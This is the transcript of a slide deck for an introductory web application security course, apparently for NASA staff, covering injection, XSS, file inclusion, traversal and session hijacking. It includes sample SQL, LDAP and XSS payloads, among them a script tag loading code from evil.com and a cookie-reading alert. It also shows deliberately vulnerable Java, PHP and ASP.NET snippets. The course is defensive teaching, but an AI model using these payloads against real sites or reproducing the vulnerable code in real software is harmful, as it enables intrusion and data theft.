Application and Website Security -- Fundamental Edition
-
Upload
daniel-owens -
Category
Technology
-
view
1.801 -
download
0
Transcript of Application and Website Security -- Fundamental Edition
Application and Website Security – Fundamental Edition
Daniel OwensIT Security Professional
Agenda
Course Introduction
Common Input Validation Flaws
Common Access Control Flaws
Common Encryption Flaws
Tools
Conclusion And Appendices
Purpose
Drum up interest
Session Prerequisites
None
Communication Media and Security Concerns
Communication media:
„Wired‟ networks
„Wireless‟ networks
Security concerns:
The Insider
The Outsider
The Technology
Nature
A Note About Security
Security helps functionality – if it doesn’t help functionality, it isn’t security.
-Daniel Owens
Consequences of Poor Security
Stolen intellectual property
System downtime
Lost productivity
Damage to NASA‟s reputation
Lost public confidence
Lost revenue
Congressional inquiries
Agenda
Course Introduction
Common Input Validation Flaws
Common Access Control Flaws
Common Encryption Flaws
Tools
Conclusion And Appendices
SQL | LDAP Injection
SQL and LDAP Injection
The injection of malicious code intended to bypass filtering and execute a query of the attacker‟s choosing
Can be thwarted using strongly typed variables, parameterized statements, escaping, and whitelists
Example Strings include:
1‟1
%31%27%20%4F%52%20%27%31%27%3D%27%31
1' OR '1'='1
*(|(mail=*))
Java SQL Injection
static void main(String[] args){
Connection conn=null;
String username=args[0];
String password=args[1];
String query=“SELECT uid, pass FROM users WHERE uid LIKE “+username+”%”;
conn=DriverManager.getConnection(“jdbc:odbc:logistics”,”admin”,”LetMeIn”);
Statement stmnt=conn.createStatement();
ResultSet rs=stmnt.executeQuery(query);
…
}
Demonstration 1
SQL Injection
Bypassing Security Checks
Case Study 1
SQL Injection
Owning Networks
Cross-Site Scripting (XSS)
XSS
The injection of client-side code
Comes in three kinds:
Persistent
Non-Persistent
DOM
Only occurs when user input influences the output
Can be stopped by assuming all input is malicious until proven otherwise through a whitelist
Can lead to a complete system compromise – for the client, the website, and the server
Cross-Site Scripting (cont.)
XSS (cont.)
Sample strings:
<script src=http://evil.com/attack.js << </script <<
<link rel=“stylesheet” href=http://evil.com/attack.css>
%3Cscript%3Epref%3Dfunction(a%2Cb) {document.write(a%2B%22%20-%3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22)%3B} %3B%3C%2Fscript%3E%3Cscript%20src%3D%22view-source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall.js%22%3E%3C%2Fscript%3E
<img src=”” onMouseOver=”alert(document.cookie)”; />
ASP.NET Cross-Site Scripting
<%@ Page Language="C#" ValidateRequest="false" %>
<html>
<script runat="server">
void btnSubmit_Click(Object sender, EventArgs e)
{
Response.Write(txtString.Text);
}
</script>
// CONTINUED ON NEXT SLIDE
ASP.NET Cross-Site Scripting (cont.)
// CONTINUED FROM PREVIOUS SLIDE
<body>
<form id="form1" runat="server">
<asp:TextBox id="txtString" runat="server"
Text="<script>alert(„hi‟);</script>" />
<asp:Button id="btnSubmit" runat="server"
OnClick="btnSubmit_Click"
Text="Submit" />
</form>
</body>
</html>
Demonstration 2
XSS
Having Fun
Remote File Include/Execution | Code Injection
Remote File Include and Execution
An attacker tricks the system into including and/or executing arbitrary files
Code Injection
Attacker tricks the system into executing arbitrary code by injecting the commands into the code
Both
Code of the attacker‟s choosing is executed
Contrary to popular belief, ANY language can suffer this
PHP Remote File Include
<?php
….
require_once($_GET[„config‟]);
require_once($_GET[„base‟].”/index.php”);
….
?>
ASP.NET Remote File Include
<%
….
set url = Request.QueryString;
set xml =Server.CreateObject(“Microsoft.XMLHTTP”);
xml.open “GET”, url, false
xml.send “”
Response.write xml.responseText
set xml = nothing
….
%>
Hidden Elements | Cookies
Hidden Elements and Cookies
Hidden fields and cookies were merely intended to provide data storage without cluttering up the user‟s view
They do not provide secure storage
They are not immutable storage locations
Neither should contain sensitive information
Both should be considered malicious until proven otherwise
Any data in it should not be directly used for output
Whitelisting should be used to prove innocence
Hidden Elements | Cookies (cont.)
Hidden Elements and Cookies (cont.)� -575840793ReferrerUrlQhttps://XXX.XXX.nasa.gov/CMTOOLS/Login.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspxTextErrorddOnClickreturnconfirm ... „USERNAME (RandomData)'); return false;ddhSetTargetText('ctl00_SimpleSearchForm_User2_InputFieldTextbox', „USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)'); return; fd-ctl00$SimpleSearchForm$User1$UserListGridView<+� fd
Agenda
Course Introduction
Common Input Validation Flaws
Common Access Control Flaws
Common Encryption Flaws
Tools
Conclusion And Appendices
Session Hijacking – Cookie Theft
Cookie Theft
The theft of a client‟s cookies by an attacker
Often possible because of other vulnerabilities –browser flaws (sandboxing), having TRACE enabled, XSS, etc
Can be hampered if mechanisms such as NONCEs are used
NONCEs should be a set of characteristics unique to the specific session – client IP, server IP, server port, user agent string, and other key information
Additional mechanisms include using secure cookies, but this has limited impact
Session Hijacking – Session Fixation
Session Fixation
An attacker uses a „known‟ session ID
Often, the attacker opens the session and keeps it open while attempting to convince a victim to login using the known session
This is often a phishing or other social engineering attack
Can be hampered if session IDs are „rekeyed‟ on login AND sessions expire and are removed quickly
Difficult to stop if sessions are guessable
Demonstration 3
Session Hijacking
Session Fixation
Directory Traversal
Directory Traversal
An attacker is able to trick the system into traversing the directory structure
In many instances, arbitrary files can be viewed
Attackers are often attempting to execute a file or gather information
If user input dictates the output, care must be taken to ensure the input is „valid‟
Whitelists become invaluable
In extreme cases, an attacker can actually use this to gain administrator access to the server
PHP Directory Traversal
<?php
….
$date=$_GET[„date‟];
if($handle=fopen(“calendar/$date”,”rb”)){
print(fread($handle,filesize(“calendar/$date”)));
fclose($handle);
}
….
?>
Agenda
Course Introduction
Common Input Validation Flaws
Common Access Control Flaws
Common Encryption Flaws
Tools
Conclusion And Appendices
Session Hijacking – Spoofing
Spoofing
Pretending to be someone else, an attacker attempts to gain the victim‟s privileges
Comes in three basic forms
Blind (write-only)
Half pipe (read-only)
Full pipe
Network configuration and other protection mechanisms can make this difficult to defeat (both for the attacker and for the developer)
Demonstration 4
Session Hijacking
Spoofing
Case Study 2
Session Hijacking
Spoofing
Weak Encryption | Using Encoding
Weak/Home-Grown Encryption
The use of weak and home grown encryption has led to the compromise of many systems
It is also what makes session hijacking via spoofing, and man-in-the-middle with bucket brigade and substitution attacks so trivial
Encoding
The use of algorithms that take output and simply change the format (normally it is the number of bits used per character)
This is not secure by any means
Case Study 3
Weak Encryption | Encoding
XORSHA
Base64
Agenda
Course Introduction
Common Input Validation Flaws
Common Access Control Flaws
Common Encryption Flaws
Tools
Conclusion and Appendices
Security Compass
XSS-Me
A free Firefox plug-in
Performs semi-automated XSS attacks against POST fields
SQL Inject-Me
A free Firefox plug-in
Performs semi-automated SQL injection attacks against POST fields
Access-Me
A free Firefox plug-in…
Other Firefox Add-ons
Web Developer Add-on
Free
Let‟s you view source files cleanly and easily
Let‟s you quickly enable and disable things (like cookies, JavaScript, and Meta Refresh)
Let‟s you view and modify form fields and cookie data
Tamper Data
Free
Let‟s you modify most request data
Fuzzers
BED.pl
Free Perl script
Performs basic tests of your SERVER
JBroFuzz
Free Java application
Let‟s you fuzz any part of an HTTP/HTTPS request in a semi-automated fashion
Powerfuzzer
Free and commercial versions (Python script)
Easy and multi-talented… automated
Other Tools
Sothink SWF Decompiler
Decompiles any Adobe Flash or Flux script
Cavaj
Free
Decompiles any Java program
Nikto
Free
Provides scans of the website looking for common, basic vulnerabilities and misconfigurations
Agenda
Course Introduction
Common Input Validation Flaws
Common Access Control Flaws
Common Encryption Flaws
Tools
Conclusion And Appendices
For More Information
Microsoft Security Site (all audiences)
http://www.microsoft.com/security
MSDN Security Site (developers)
http://msdn.microsoft.com/security
TechNet Security Site (IT professionals)
http://www.microsoft.com/technet/security
SANS Top-20 (IT Professionals)
http://www.sans.org/top20/
For More Information (cont.)
Common Weakness Enumeration (CWE)/SANS Top 25 Most Dangerous Programming Errors (developers)
http://cwe.mitre.org/top25/index.html
GRC IT Security Office
http://itsecurity.grc.nasa.gov
Most Common Software Errors
http://discussweb.com/software-testing/803-most-common-software-errors.html
Acknowledgements
I stole the background from Microsoft
I stole a lot from my experiences and previous writings